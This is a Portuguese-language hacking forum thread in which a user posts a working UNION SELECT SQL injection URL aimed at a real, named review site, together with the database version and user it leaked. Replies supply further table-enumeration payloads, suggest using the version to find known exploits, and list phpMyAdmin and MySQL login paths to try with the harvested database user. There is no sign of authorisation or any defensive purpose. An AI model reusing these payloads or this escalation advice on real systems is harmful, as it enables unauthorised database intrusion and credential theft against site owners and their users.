Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

O que é/pra que serve esses codigos Sqli Injection

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    O que é/pra que serve esses codigos Sqli Injection

    Pelo que percebi, por exemplo :
    neste link aqui
    Código:
    http://www.worstpreviews.com/review.php?id=-115%20union%20select%20user%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,version%28%29,31,32,33,34,35,36,37,38,39,40,41--
    colem no mozila pra facilitar a visualização /\

    quando usei o version() (que pelo que sei é mesma coisa que @@version) o que eu posso fazer sabendo esse valor

    5.1.56-log

    e quando usei o user() (esse nao da pra substituir por @@usuario) de que usuario eu estou falando, onde o mesmo loga?

    alexgi_2@localhost

    -
    gostaria de uma explicação mais bem explicada/elaborada porque as veses nao consigo entender coisas muito noobs ;/, obrigado ae quem poder me responder
    Similar Threads

  • Font Size
    #2
    depende, se tu souber o nome das tabelas. poderia usar tbm: -115+union+select+all+1,2,3,4+from+users--
    vai mudando. tente descubrir a tabela atual do site. digamos q a tabela do site atual é worst_site
    -115+union+select+all+1,2,3,4+users+from+worst_site
    o codigo faz uma consulta no bd '-'

    Comment


    • Font Size
      #3
      o que eu posso fazer sabendo esse valor
      Você pode explorar determinadas vulnerabilidades.
      Por exemplo o apache 1.2.20 é vulneravel a Buffer Overflow. Já na versão 1.7 essa problema provelmente não ocorrerá mais no entanto pode ocorrer novas vulnerabilidades nessa nova versão

      Por tanto servidor sql com versão superior a 5.0 (5.1.56-log) por exemplo você usar varias tecnicas que você pode encontrar facilmente aqui no forum.
      Servidores com sql abaixo de 5.0 são um pouco mais dificeis de serem explorados mesmo sendo uma versão inferior.

      e quando usei o user() (esse nao da pra substituir por @@usuario) de que usuario eu estou falando, onde o mesmo loga?
      Esse usuario é o que conecta a pagina ao banco de dados. O simbolo @ significa usuario no servidor assim como seu e-mail é seumail@hotmail.com (Seumail = usuario, hotmail.com = servidor).

      Nesse seu caso o servidor é local alexgi_2@localhost, poderia ocorrer de o database ficar em outro servidor assim alexgi_2@gh-db.com.br.

      Onde você deve logar depende muito de que sistema de banco de dados o site ta usando, possiveis lugares são:

      site.com.br/phpmyadmin/
      mysql.site.com.br
      site.com.br/mysql

      Esse são um dos lugares que você pode logar.

      O usuario obtido pela função user() não é o mesmo geralmente do administrador das paginas do site.

      Comment


      • Font Size
        #4
        Postado Originalmente por 4linux- Ver Post
        depende, se tu souber o nome das tabelas. poderia usar tbm: -115+union+select+all+1,2,3,4+from+users--
        vai mudando. tente descubrir a tabela atual do site. digamos q a tabela do site atual é worst_site
        -115+union+select+all+1,2,3,4+users+from+worst_site
        o codigo faz uma consulta no bd '-'

        muito obrigado, mas nao era bem isso que queria saber, isso ae eu ja sei

        Comment


        • Font Size
          #5
          Postado Originalmente por Twi John Ver Post
          Você pode explorar determinadas vulnerabilidades.
          Por exemplo o apache 1.2.20 é vulneravel a Buffer Overflow. Já na versão 1.7 essa problema provelmente não ocorrerá mais no entanto pode ocorrer novas vulnerabilidades nessa nova versão

          Por tanto servidor sql com versão superior a 5.0 (5.1.56-log) por exemplo você usar varias tecnicas que você pode encontrar facilmente aqui no forum.
          Servidores com sql abaixo de 5.0 são um pouco mais dificeis de serem explorados mesmo sendo uma versão inferior.



          Esse usuario é o que conecta a pagina ao banco de dados. O simbolo @ significa usuario no servidor assim como seu e-mail é seumail@hotmail.com (Seumail = usuario, hotmail.com = servidor).

          Nesse seu caso o servidor é local alexgi_2@localhost, poderia ocorrer de o database ficar em outro servidor assim alexgi_2@gh-db.com.br.

          Onde você deve logar depende muito de que sistema de banco de dados o site ta usando, possiveis lugares são:

          site.com.br/phpmyadmin/
          mysql.site.com.br
          site.com.br/mysql

          Esse são um dos lugares que você pode logar.

          O usuario obtido pela função user() não é o mesmo geralmente do administrador das paginas do site.


          muito obrigado cara, era exatamente isso quer queria saber, muito boa explicação

          Comment

          X
          Working...
          X